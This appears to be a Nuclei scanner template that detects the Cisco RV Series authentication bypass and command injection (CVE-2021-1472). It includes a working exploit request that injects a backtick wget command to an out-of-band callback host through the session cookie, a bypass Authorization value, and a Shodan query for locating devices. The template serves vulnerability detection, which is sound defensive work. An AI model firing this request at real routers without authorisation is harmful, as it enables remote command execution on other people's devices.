72 lines
2.7 KiB
YAML
72 lines
2.7 KiB
YAML
id: CVE-2021-1472
|
|
|
|
info:
|
|
name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
|
|
author: gy741
|
|
severity: critical
|
|
description: |
|
|
Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote
|
|
attacker could execute arbitrary commands or bypass authentication and upload files on an affected device.
|
|
reference:
|
|
- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
|
|
- https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-1472
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-1473
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-1472
|
|
cwe-id: CWE-287
|
|
metadata:
|
|
shodan-query: http.html:"Cisco rv340"
|
|
verified: "true"
|
|
tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /upload HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: sessionid='`wget http://{{interactsh-url}}`'
|
|
Authorization: QUt6NkpTeTE6dmk4cW8=
|
|
Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
|
|
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="option"
|
|
|
|
5NW9Cw1J
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="destination"
|
|
|
|
J0I5k131j2Ku
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="file.path"
|
|
|
|
EKsmqqg0
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="file"; filename="config.xml"
|
|
Content-Type: application/xml
|
|
|
|
qJ57CM9
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="filename"
|
|
|
|
JbYXJR74n.xml
|
|
-----------------------------392306610282184777655655237536
|
|
Content-Disposition: form-data; name="GXbLINHYkFI"
|
|
|
|
<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
|
|
-----------------------------392306610282184777655655237536--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- http
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"jsonrpc":'
|